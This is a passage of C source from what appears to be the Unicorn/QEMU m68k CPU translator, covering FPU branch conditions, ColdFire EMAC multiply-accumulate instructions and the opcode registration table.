*/ fpsr = tcg_temp_new(tcg_ctx); gen_load_fcr(s, fpsr, M68K_FPSR); switch (cond) { case 0: /* False */ case 16: /* Signaling False */ c->v1 = c->v2; c->tcond = TCG_COND_NEVER; break; case 1: /* EQual Z */ case 17: /* Signaling EQual Z */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_Z); c->tcond = TCG_COND_NE; break; case 2: /* Ordered Greater Than !(A || Z || N) */ case 18: /* Greater Than !(A || Z || N) */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A | FPSR_CC_Z | FPSR_CC_N); c->tcond = TCG_COND_EQ; break; case 3: /* Ordered Greater than or Equal Z || !(A || N) */ case 19: /* Greater than or Equal Z || !(A || N) */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A); tcg_gen_shli_i32(tcg_ctx, c->v1, c->v1, ctz32(FPSR_CC_N) - ctz32(FPSR_CC_A)); tcg_gen_andi_i32(tcg_ctx, fpsr, fpsr, FPSR_CC_Z | FPSR_CC_N); tcg_gen_or_i32(tcg_ctx, c->v1, c->v1, fpsr); tcg_gen_xori_i32(tcg_ctx, c->v1, c->v1, FPSR_CC_N); c->tcond = TCG_COND_NE; break; case 4: /* Ordered Less Than !(!N || A || Z); */ case 20: /* Less Than !(!N || A || Z); */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_xori_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_N); tcg_gen_andi_i32(tcg_ctx, c->v1, c->v1, FPSR_CC_N | FPSR_CC_A | FPSR_CC_Z); c->tcond = TCG_COND_EQ; break; case 5: /* Ordered Less than or Equal Z || (N && !A) */ case 21: /* Less than or Equal Z || (N && !A) */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A); tcg_gen_shli_i32(tcg_ctx, c->v1, c->v1, ctz32(FPSR_CC_N) - ctz32(FPSR_CC_A)); tcg_gen_andc_i32(tcg_ctx, c->v1, fpsr, c->v1); tcg_gen_andi_i32(tcg_ctx, c->v1, c->v1, FPSR_CC_Z | FPSR_CC_N); c->tcond = TCG_COND_NE; break; case 6: /* Ordered Greater or Less than !(A || Z) */ case 22: /* Greater or Less than !(A || Z) */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A | FPSR_CC_Z); c->tcond = TCG_COND_EQ; break; case 7: /* Ordered !A */ case 23: /* Greater, Less or Equal !A */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A); c->tcond = TCG_COND_EQ; break; case 8: /* Unordered A */ case 24: /* Not Greater, Less or Equal A */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A); c->tcond = TCG_COND_NE; break; case 9: /* Unordered or Equal A || Z */ case 25: /* Not Greater or Less then A || Z */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A | FPSR_CC_Z); c->tcond = TCG_COND_NE; break; case 10: /* Unordered or Greater Than A || !(N || Z)) */ case 26: /* Not Less or Equal A || !(N || Z)) */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_Z); tcg_gen_shli_i32(tcg_ctx, c->v1, c->v1, ctz32(FPSR_CC_N) - ctz32(FPSR_CC_Z)); tcg_gen_andi_i32(tcg_ctx, fpsr, fpsr, FPSR_CC_A | FPSR_CC_N); tcg_gen_or_i32(tcg_ctx, c->v1, c->v1, fpsr); tcg_gen_xori_i32(tcg_ctx, c->v1, c->v1, FPSR_CC_N); c->tcond = TCG_COND_NE; break; case 11: /* Unordered or Greater or Equal A || Z || !N */ case 27: /* Not Less Than A || Z || !N */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A | FPSR_CC_Z | FPSR_CC_N); tcg_gen_xori_i32(tcg_ctx, c->v1, c->v1, FPSR_CC_N); c->tcond = TCG_COND_NE; break; case 12: /* Unordered or Less Than A || (N && !Z) */ case 28: /* Not Greater than or Equal A || (N && !Z) */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; 
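        /*
         * Compute A || (N && !Z) branch-free: shift Z up into the N bit
         * position, use andc to clear N when Z is set, then test whether
         * anything remains in A | N.
         */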
tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_Z); tcg_gen_shli_i32(tcg_ctx, c->v1, c->v1, ctz32(FPSR_CC_N) - ctz32(FPSR_CC_Z)); tcg_gen_andc_i32(tcg_ctx, c->v1, fpsr, c->v1); tcg_gen_andi_i32(tcg_ctx, c->v1, c->v1, FPSR_CC_A | FPSR_CC_N); c->tcond = TCG_COND_NE; break; case 13: /* Unordered or Less or Equal A || Z || N */ case 29: /* Not Greater Than A || Z || N */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_A | FPSR_CC_Z | FPSR_CC_N); c->tcond = TCG_COND_NE; break; case 14: /* Not Equal !Z */ case 30: /* Signaling Not Equal !Z */ c->v1 = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_andi_i32(tcg_ctx, c->v1, fpsr, FPSR_CC_Z); c->tcond = TCG_COND_EQ; break; case 15: /* True */ case 31: /* Signaling True */ c->v1 = c->v2; c->tcond = TCG_COND_ALWAYS; break; } tcg_temp_free(tcg_ctx, fpsr); } static void gen_fjmpcc(DisasContext *s, int cond, TCGLabel *l1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare c; gen_fcc_cond(&c, s, cond); update_cc_op(s); tcg_gen_brcond_i32(tcg_ctx, c.tcond, c.v1, c.v2, l1); free_cond(tcg_ctx, &c); } DISAS_INSN(fbcc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t offset; uint32_t base; TCGLabel *l1; base = s->pc; offset = (int16_t)read_im16(env, s); if (insn & (1 << 6)) { offset = (offset << 16) | read_im16(env, s); } l1 = gen_new_label(tcg_ctx); update_cc_op(s); gen_fjmpcc(s, insn & 0x3f, l1); gen_jmp_tb(s, 0, s->pc); gen_set_label(tcg_ctx, l1); gen_jmp_tb(s, 1, base + offset); } DISAS_INSN(fscc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare c; int cond; TCGv tmp; uint16_t ext; ext = read_im16(env, s); cond = ext & 0x3f; gen_fcc_cond(&c, s, cond); tmp = tcg_temp_new(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, c.tcond, tmp, c.v1, c.v2); free_cond(tcg_ctx, &c); tcg_gen_neg_i32(tcg_ctx, tmp, tmp); DEST_EA(env, insn, OS_BYTE, tmp, NULL); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(frestore) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } if (m68k_feature(s->env, M68K_FEATURE_M68040)) { SRC_EA(env, addr, OS_LONG, 0, NULL); /* FIXME: check the state frame */ } else { disas_undef(env, s, insn); } } DISAS_INSN(fsave) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } if (m68k_feature(s->env, M68K_FEATURE_M68040)) { /* always write IDLE */ TCGv idle = tcg_const_i32(tcg_ctx, 0x41000000); DEST_EA(env, insn, OS_LONG, idle, NULL); tcg_temp_free(tcg_ctx, idle); } else { disas_undef(env, s, insn); } } static inline TCGv gen_mac_extract_word(DisasContext *s, TCGv val, int upper) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp = tcg_temp_new(tcg_ctx); if (s->env->macsr & MACSR_FI) { if (upper) tcg_gen_andi_i32(tcg_ctx, tmp, val, 0xffff0000); else tcg_gen_shli_i32(tcg_ctx, tmp, val, 16); } else if (s->env->macsr & MACSR_SU) { if (upper) tcg_gen_sari_i32(tcg_ctx, tmp, val, 16); else tcg_gen_ext16s_i32(tcg_ctx, tmp, val); } else { if (upper) tcg_gen_shri_i32(tcg_ctx, tmp, val, 16); else tcg_gen_ext16u_i32(tcg_ctx, tmp, val); } return tmp; } static void gen_mac_clear_flags(TCGContext *tcg_ctx) { tcg_gen_andi_i32(tcg_ctx, QREG_MACSR, QREG_MACSR, ~(MACSR_V | MACSR_Z | MACSR_N | MACSR_EV)); } DISAS_INSN(mac) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv rx; TCGv ry; uint16_t ext; int acc; TCGv tmp; TCGv addr; TCGv loadval; int dual; TCGv saved_flags; if (!s->done_mac) { s->mactmp = tcg_temp_new_i64(tcg_ctx); s->done_mac = 1; } ext = read_im16(env, s); acc = ((insn >> 7) & 1) | ((ext >> 3) & 2); 
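    /* Accumulator index: bit 0 comes from insn bit 7, bit 1 from ext bit 4. */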
dual = ((insn & 0x30) != 0 && (ext & 3) != 0); if (dual && !m68k_feature(s->env, M68K_FEATURE_CF_EMAC_B)) { disas_undef(env, s, insn); return; } if (insn & 0x30) { /* MAC with load. */ tmp = gen_lea(env, s, insn, OS_LONG); addr = tcg_temp_new(tcg_ctx); tcg_gen_and_i32(tcg_ctx, addr, tmp, QREG_MAC_MASK); /* * Load the value now to ensure correct exception behavior. * Perform writeback after reading the MAC inputs. */ loadval = gen_load(s, OS_LONG, addr, 0, IS_USER(s)); acc ^= 1; rx = (ext & 0x8000) ? AREG(ext, 12) : DREG(insn, 12); ry = (ext & 8) ? AREG(ext, 0) : DREG(ext, 0); } else { loadval = addr = tcg_ctx->NULL_QREG; rx = (insn & 0x40) ? AREG(insn, 9) : DREG(insn, 9); ry = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); } gen_mac_clear_flags(tcg_ctx); #if 0 l1 = -1; /* Disabled because conditional branches clobber temporary vars. */ if ((s->env->macsr & MACSR_OMC) != 0 && !dual) { /* Skip the multiply if we know we will ignore it. */ l1 = gen_new_label(tcg_ctx); tmp = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, tmp, QREG_MACSR, 1 << (acc + 8)); gen_op_jmp_nz32(tmp, l1); } #endif if ((ext & 0x0800) == 0) { /* Word. */ rx = gen_mac_extract_word(s, rx, (ext & 0x80) != 0); ry = gen_mac_extract_word(s, ry, (ext & 0x40) != 0); } if (s->env->macsr & MACSR_FI) { gen_helper_macmulf(tcg_ctx, s->mactmp, tcg_ctx->cpu_env, rx, ry); } else { if (s->env->macsr & MACSR_SU) gen_helper_macmuls(tcg_ctx, s->mactmp, tcg_ctx->cpu_env, rx, ry); else gen_helper_macmulu(tcg_ctx, s->mactmp, tcg_ctx->cpu_env, rx, ry); switch ((ext >> 9) & 3) { case 1: tcg_gen_shli_i64(tcg_ctx, s->mactmp, s->mactmp, 1); break; case 3: tcg_gen_shri_i64(tcg_ctx, s->mactmp, s->mactmp, 1); break; } } if (dual) { /* Save the overflow flag from the multiply. */ saved_flags = tcg_temp_new(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, saved_flags, QREG_MACSR); } else { saved_flags = tcg_ctx->NULL_QREG; } #if 0 /* Disabled because conditional branches clobber temporary vars. */ if ((s->env->macsr & MACSR_OMC) != 0 && dual) { /* Skip the accumulate if the value is already saturated. */ l1 = gen_new_label(tcg_ctx); tmp = tcg_temp_new(tcg_ctx); gen_op_and32(tmp, QREG_MACSR, tcg_const_i32(tcg_ctx, MACSR_PAV0 << acc)); gen_op_jmp_nz32(tmp, l1); } #endif if (insn & 0x100) tcg_gen_sub_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); else tcg_gen_add_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); if (s->env->macsr & MACSR_FI) gen_helper_macsatf(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); else if (s->env->macsr & MACSR_SU) gen_helper_macsats(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); else gen_helper_macsatu(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); #if 0 /* Disabled because conditional branches clobber temporary vars. */ if (l1 != -1) gen_set_label(tcg_ctx, l1); #endif if (dual) { /* Dual accumulate variant. */ acc = (ext >> 2) & 3; /* Restore the overflow flag from the multiplier. */ tcg_gen_mov_i32(tcg_ctx, QREG_MACSR, saved_flags); #if 0 /* Disabled because conditional branches clobber temporary vars. */ if ((s->env->macsr & MACSR_OMC) != 0) { /* Skip the accumulate if the value is already saturated. 
*/ l1 = gen_new_label(tcg_ctx); tmp = tcg_temp_new(tcg_ctx); gen_op_and32(tmp, QREG_MACSR, tcg_const_i32(tcg_ctx, MACSR_PAV0 << acc)); gen_op_jmp_nz32(tmp, l1); } #endif if (ext & 2) tcg_gen_sub_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); else tcg_gen_add_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); if (s->env->macsr & MACSR_FI) gen_helper_macsatf(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); else if (s->env->macsr & MACSR_SU) gen_helper_macsats(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); else gen_helper_macsatu(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); #if 0 /* Disabled because conditional branches clobber temporary vars. */ if (l1 != -1) gen_set_label(tcg_ctx, l1); #endif } gen_helper_mac_set_flags(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); if (insn & 0x30) { TCGv rw; rw = (insn & 0x40) ? AREG(insn, 9) : DREG(insn, 9); tcg_gen_mov_i32(tcg_ctx, rw, loadval); /* * FIXME: Should address writeback happen with the masked or * unmasked value? */ switch ((insn >> 3) & 7) { case 3: /* Post-increment. */ tcg_gen_addi_i32(tcg_ctx, AREG(insn, 0), addr, 4); break; case 4: /* Pre-decrement. */ tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), addr); } tcg_temp_free(tcg_ctx, loadval); } } DISAS_INSN(from_mac) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv rx; TCGv_i64 acc; int accnum; rx = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); accnum = (insn >> 9) & 3; acc = MACREG(accnum); if (s->env->macsr & MACSR_FI) { gen_helper_get_macf(tcg_ctx, rx, tcg_ctx->cpu_env, acc); } else if ((s->env->macsr & MACSR_OMC) == 0) { tcg_gen_extrl_i64_i32(tcg_ctx, rx, acc); } else if (s->env->macsr & MACSR_SU) { gen_helper_get_macs(tcg_ctx, rx, acc); } else { gen_helper_get_macu(tcg_ctx, rx, acc); } if (insn & 0x40) { tcg_gen_movi_i64(tcg_ctx, acc, 0); tcg_gen_andi_i32(tcg_ctx, QREG_MACSR, QREG_MACSR, ~(MACSR_PAV0 << accnum)); } } DISAS_INSN(move_mac) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* FIXME: This can be done without a helper. */ int src; TCGv dest; src = insn & 3; dest = tcg_const_i32(tcg_ctx, (insn >> 9) & 3); gen_helper_mac_move(tcg_ctx, tcg_ctx->cpu_env, dest, tcg_const_i32(tcg_ctx, src)); gen_mac_clear_flags(tcg_ctx); gen_helper_mac_set_flags(tcg_ctx, tcg_ctx->cpu_env, dest); } DISAS_INSN(from_macsr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; reg = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); tcg_gen_mov_i32(tcg_ctx, reg, QREG_MACSR); } DISAS_INSN(from_mask) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; reg = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); tcg_gen_mov_i32(tcg_ctx, reg, QREG_MAC_MASK); } DISAS_INSN(from_mext) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv acc; reg = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); acc = tcg_const_i32(tcg_ctx, (insn & 0x400) ? 
2 : 0); if (s->env->macsr & MACSR_FI) gen_helper_get_mac_extf(tcg_ctx, reg, tcg_ctx->cpu_env, acc); else gen_helper_get_mac_exti(tcg_ctx, reg, tcg_ctx->cpu_env, acc); } DISAS_INSN(macsr_to_ccr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, tmp, QREG_MACSR, 0xf); gen_helper_set_sr(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free(tcg_ctx, tmp); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(to_mac) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 acc; TCGv val; int accnum; accnum = (insn >> 9) & 3; acc = MACREG(accnum); SRC_EA(env, val, OS_LONG, 0, NULL); if (s->env->macsr & MACSR_FI) { tcg_gen_ext_i32_i64(tcg_ctx, acc, val); tcg_gen_shli_i64(tcg_ctx, acc, acc, 8); } else if (s->env->macsr & MACSR_SU) { tcg_gen_ext_i32_i64(tcg_ctx, acc, val); } else { tcg_gen_extu_i32_i64(tcg_ctx, acc, val); } tcg_gen_andi_i32(tcg_ctx, QREG_MACSR, QREG_MACSR, ~(MACSR_PAV0 << accnum)); gen_mac_clear_flags(tcg_ctx); gen_helper_mac_set_flags(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, accnum)); } DISAS_INSN(to_macsr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv val; SRC_EA(env, val, OS_LONG, 0, NULL); gen_helper_set_macsr(tcg_ctx, tcg_ctx->cpu_env, val); gen_exit_tb(s); } DISAS_INSN(to_mask) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv val; SRC_EA(env, val, OS_LONG, 0, NULL); tcg_gen_ori_i32(tcg_ctx, QREG_MAC_MASK, val, 0xffff0000); } DISAS_INSN(to_mext) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv val; TCGv acc; SRC_EA(env, val, OS_LONG, 0, NULL); acc = tcg_const_i32(tcg_ctx, (insn & 0x400) ? 2 : 0); if (s->env->macsr & MACSR_FI) gen_helper_set_mac_extf(tcg_ctx, tcg_ctx->cpu_env, val, acc); else if (s->env->macsr & MACSR_SU) gen_helper_set_mac_exts(tcg_ctx, tcg_ctx->cpu_env, val, acc); else gen_helper_set_mac_extu(tcg_ctx, tcg_ctx->cpu_env, val, acc); } static disas_proc opcode_table[65536]; static void register_opcode (disas_proc proc, uint16_t opcode, uint16_t mask) { int i; int from; int to; /* Sanity check. All set bits must be included in the mask. */ if (opcode & ~mask) { fprintf(stderr, "qemu internal error: bogus opcode definition %04x/%04x\n", opcode, mask); abort(); } /* * This could probably be cleverer. For now just optimize the case where * the top bits are known. */ /* Find the first zero bit in the mask. */ i = 0x8000; while ((i & mask) != 0) i >>= 1; /* Iterate over all combinations of this and lower bits. */ if (i == 0) i = 1; else i <<= 1; from = opcode & ~(i - 1); to = from + i; for (i = from; i < to; i++) { if ((i & mask) == opcode) opcode_table[i] = proc; } } /* * Register m68k opcode handlers. Order is important. * Later insn override earlier ones. */ void register_m68k_insns (CPUM68KState *env) { /* * Build the opcode table only once to avoid * multithreading issues. */ if (opcode_table[0] != NULL) { return; } /* * use BASE() for instruction available * for CF_ISA_A and M68000. 
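 * and INSN() for instructions gated on a CPU feature flag.
 * For example,
 *     BASE(move, 1000, f000)
 * expands to
 *     register_opcode(disas_move, 0x1000, 0xf000);
 * and fills every opcode_table slot whose encoding matches 0x1000
 * under mask 0xf000 (all MOVE.B encodings).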
*/ #define BASE(name, opcode, mask) \ register_opcode(disas_##name, 0x##opcode, 0x##mask) #define INSN(name, opcode, mask, feature) do { \ if (m68k_feature(env, M68K_FEATURE_##feature)) \ BASE(name, opcode, mask); \ } while(0) BASE(undef, 0000, 0000); INSN(arith_im, 0080, fff8, CF_ISA_A); INSN(arith_im, 0000, ff00, M68000); INSN(chk2, 00c0, f9c0, CHK2); INSN(bitrev, 00c0, fff8, CF_ISA_APLUSC); BASE(bitop_reg, 0100, f1c0); BASE(bitop_reg, 0140, f1c0); BASE(bitop_reg, 0180, f1c0); BASE(bitop_reg, 01c0, f1c0); INSN(movep, 0108, f138, MOVEP); INSN(arith_im, 0280, fff8, CF_ISA_A); INSN(arith_im, 0200, ff00, M68000); INSN(undef, 02c0, ffc0, M68000); INSN(byterev, 02c0, fff8, CF_ISA_APLUSC); INSN(arith_im, 0480, fff8, CF_ISA_A); INSN(arith_im, 0400, ff00, M68000); INSN(undef, 04c0, ffc0, M68000); INSN(arith_im, 0600, ff00, M68000); INSN(undef, 06c0, ffc0, M68000); INSN(ff1, 04c0, fff8, CF_ISA_APLUSC); INSN(arith_im, 0680, fff8, CF_ISA_A); INSN(arith_im, 0c00, ff38, CF_ISA_A); INSN(arith_im, 0c00, ff00, M68000); BASE(bitop_im, 0800, ffc0); BASE(bitop_im, 0840, ffc0); BASE(bitop_im, 0880, ffc0); BASE(bitop_im, 08c0, ffc0); INSN(arith_im, 0a80, fff8, CF_ISA_A); INSN(arith_im, 0a00, ff00, M68000); INSN(moves, 0e00, ff00, M68000); INSN(cas, 0ac0, ffc0, CAS); INSN(cas, 0cc0, ffc0, CAS); INSN(cas, 0ec0, ffc0, CAS); INSN(cas2w, 0cfc, ffff, CAS); INSN(cas2l, 0efc, ffff, CAS); BASE(move, 1000, f000); BASE(move, 2000, f000); BASE(move, 3000, f000); INSN(chk, 4000, f040, M68000); INSN(strldsr, 40e7, ffff, CF_ISA_APLUSC); INSN(negx, 4080, fff8, CF_ISA_A); INSN(negx, 4000, ff00, M68000); INSN(undef, 40c0, ffc0, M68000); INSN(move_from_sr, 40c0, fff8, CF_ISA_A); INSN(move_from_sr, 40c0, ffc0, M68000); BASE(lea, 41c0, f1c0); BASE(clr, 4200, ff00); BASE(undef, 42c0, ffc0); INSN(move_from_ccr, 42c0, fff8, CF_ISA_A); INSN(move_from_ccr, 42c0, ffc0, M68000); INSN(neg, 4480, fff8, CF_ISA_A); INSN(neg, 4400, ff00, M68000); INSN(undef, 44c0, ffc0, M68000); BASE(move_to_ccr, 44c0, ffc0); INSN(not, 4680, fff8, CF_ISA_A); INSN(not, 4600, ff00, M68000); BASE(move_to_sr, 46c0, ffc0); INSN(nbcd, 4800, ffc0, M68000); INSN(linkl, 4808, fff8, M68000); BASE(pea, 4840, ffc0); BASE(swap, 4840, fff8); INSN(bkpt, 4848, fff8, BKPT); INSN(movem, 48d0, fbf8, CF_ISA_A); INSN(movem, 48e8, fbf8, CF_ISA_A); INSN(movem, 4880, fb80, M68000); BASE(ext, 4880, fff8); BASE(ext, 48c0, fff8); BASE(ext, 49c0, fff8); BASE(tst, 4a00, ff00); INSN(tas, 4ac0, ffc0, CF_ISA_B); INSN(tas, 4ac0, ffc0, M68000); INSN(halt, 4ac8, ffff, CF_ISA_A); INSN(pulse, 4acc, ffff, CF_ISA_A); BASE(illegal, 4afc, ffff); INSN(mull, 4c00, ffc0, CF_ISA_A); INSN(mull, 4c00, ffc0, LONG_MULDIV); INSN(divl, 4c40, ffc0, CF_ISA_A); INSN(divl, 4c40, ffc0, LONG_MULDIV); INSN(sats, 4c80, fff8, CF_ISA_B); BASE(trap, 4e40, fff0); BASE(link, 4e50, fff8); BASE(unlk, 4e58, fff8); INSN(move_to_usp, 4e60, fff8, USP); INSN(move_from_usp, 4e68, fff8, USP); INSN(reset, 4e70, ffff, M68000); BASE(stop, 4e72, ffff); BASE(rte, 4e73, ffff); INSN(cf_movec, 4e7b, ffff, CF_ISA_A); INSN(m68k_movec, 4e7a, fffe, M68000); BASE(nop, 4e71, ffff); INSN(rtd, 4e74, ffff, RTD); BASE(rts, 4e75, ffff); BASE(jump, 4e80, ffc0); BASE(jump, 4ec0, ffc0); INSN(addsubq, 5000, f080, M68000); BASE(addsubq, 5080, f0c0); INSN(scc, 50c0, f0f8, CF_ISA_A); /* Scc.B Dx */ INSN(scc, 50c0, f0c0, M68000); /* Scc.B <EA> */ INSN(dbcc, 50c8, f0f8, M68000); INSN(tpf, 51f8, fff8, CF_ISA_A); /* Branch instructions. */ BASE(branch, 6000, f000); /* Disable long branch instructions, then add back the ones we want. 
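 * This relies on register_opcode() simply overwriting table slots: the
 * blanket undef entry for 0x60ff/0xf0ff below is overridden by the
 * later, feature-gated INSN() registrations where the ISA supports them.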
*/ BASE(undef, 60ff, f0ff); /* All long branches. */ INSN(branch, 60ff, f0ff, CF_ISA_B); INSN(undef, 60ff, ffff, CF_ISA_B); /* bra.l */ INSN(branch, 60ff, ffff, BRAL); INSN(branch, 60ff, f0ff, BCCL); BASE(moveq, 7000, f100); INSN(mvzs, 7100, f100, CF_ISA_B); BASE(or, 8000, f000); BASE(divw, 80c0, f0c0); INSN(sbcd_reg, 8100, f1f8, M68000); INSN(sbcd_mem, 8108, f1f8, M68000); BASE(addsub, 9000, f000); INSN(undef, 90c0, f0c0, CF_ISA_A); INSN(subx_reg, 9180, f1f8, CF_ISA_A); INSN(subx_reg, 9100, f138, M68000); INSN(subx_mem, 9108, f138, M68000); INSN(suba, 91c0, f1c0, CF_ISA_A); INSN(suba, 90c0, f0c0, M68000); BASE(undef_mac, a000, f000); INSN(mac, a000, f100, CF_EMAC); INSN(from_mac, a180, f9b0, CF_EMAC); INSN(move_mac, a110, f9fc, CF_EMAC); INSN(from_macsr,a980, f9f0, CF_EMAC); INSN(from_mask, ad80, fff0, CF_EMAC); INSN(from_mext, ab80, fbf0, CF_EMAC); INSN(macsr_to_ccr, a9c0, ffff, CF_EMAC); INSN(to_mac, a100, f9c0, CF_EMAC); INSN(to_macsr, a900, ffc0, CF_EMAC); INSN(to_mext, ab00, fbc0, CF_EMAC); INSN(to_mask, ad00, ffc0, CF_EMAC); INSN(mov3q, a140, f1c0, CF_ISA_B); INSN(cmp, b000, f1c0, CF_ISA_B); /* cmp.b */ INSN(cmp, b040, f1c0, CF_ISA_B); /* cmp.w */ INSN(cmpa, b0c0, f1c0, CF_ISA_B); /* cmpa.w */ INSN(cmp, b080, f1c0, CF_ISA_A); INSN(cmpa, b1c0, f1c0, CF_ISA_A); INSN(cmp, b000, f100, M68000); INSN(eor, b100, f100, M68000); INSN(cmpm, b108, f138, M68000); INSN(cmpa, b0c0, f0c0, M68000); INSN(eor, b180, f1c0, CF_ISA_A); BASE(and, c000, f000); INSN(exg_dd, c140, f1f8, M68000); INSN(exg_aa, c148, f1f8, M68000); INSN(exg_da, c188, f1f8, M68000); BASE(mulw, c0c0, f0c0); INSN(abcd_reg, c100, f1f8, M68000); INSN(abcd_mem, c108, f1f8, M68000); BASE(addsub, d000, f000); INSN(undef, d0c0, f0c0, CF_ISA_A); INSN(addx_reg, d180, f1f8, CF_ISA_A); INSN(addx_reg, d100, f138, M68000); INSN(addx_mem, d108, f138, M68000); INSN(adda, d1c0, f1c0, CF_ISA_A); INSN(adda, d0c0, f0c0, M68000); INSN(shift_im, e080, f0f0, CF_ISA_A); INSN(shift_reg, e0a0, f0f0, CF_ISA_A); INSN(shift8_im, e000, f0f0, M68000); INSN(shift16_im, e040, f0f0, M68000); INSN(shift_im, e080, f0f0, M68000); INSN(shift8_reg, e020, f0f0, M68000); INSN(shift16_reg, e060, f0f0, M68000); INSN(shift_reg, e0a0, f0f0, M68000); INSN(shift_mem, e0c0, fcc0, M68000); INSN(rotate_im, e090, f0f0, M68000); INSN(rotate8_im, e010, f0f0, M68000); INSN(rotate16_im, e050, f0f0, M68000); INSN(rotate_reg, e0b0, f0f0, M68000); INSN(rotate8_reg, e030, f0f0, M68000); INSN(rotate16_reg, e070, f0f0, M68000); INSN(rotate_mem, e4c0, fcc0, M68000); INSN(bfext_mem, e9c0, fdc0, BITFIELD); /* bfextu & bfexts */ INSN(bfext_reg, e9c0, fdf8, BITFIELD); INSN(bfins_mem, efc0, ffc0, BITFIELD); INSN(bfins_reg, efc0, fff8, BITFIELD); INSN(bfop_mem, eac0, ffc0, BITFIELD); /* bfchg */ INSN(bfop_reg, eac0, fff8, BITFIELD); /* bfchg */ INSN(bfop_mem, ecc0, ffc0, BITFIELD); /* bfclr */ INSN(bfop_reg, ecc0, fff8, BITFIELD); /* bfclr */ INSN(bfop_mem, edc0, ffc0, BITFIELD); /* bfffo */ INSN(bfop_reg, edc0, fff8, BITFIELD); /* bfffo */ INSN(bfop_mem, eec0, ffc0, BITFIELD); /* bfset */ INSN(bfop_reg, eec0, fff8, BITFIELD); /* bfset */ INSN(bfop_mem, e8c0, ffc0, BITFIELD); /* bftst */ INSN(bfop_reg, e8c0, fff8, BITFIELD); /* bftst */ BASE(undef_fpu, f000, f000); INSN(fpu, f200, ffc0, CF_FPU); INSN(fbcc, f280, ffc0, CF_FPU); INSN(fpu, f200, ffc0, FPU); INSN(fscc, f240, ffc0, FPU); INSN(fbcc, f280, ff80, FPU); INSN(frestore, f340, ffc0, CF_FPU); INSN(fsave, f300, ffc0, CF_FPU); INSN(frestore, f340, ffc0, FPU); INSN(fsave, f300, ffc0, FPU); 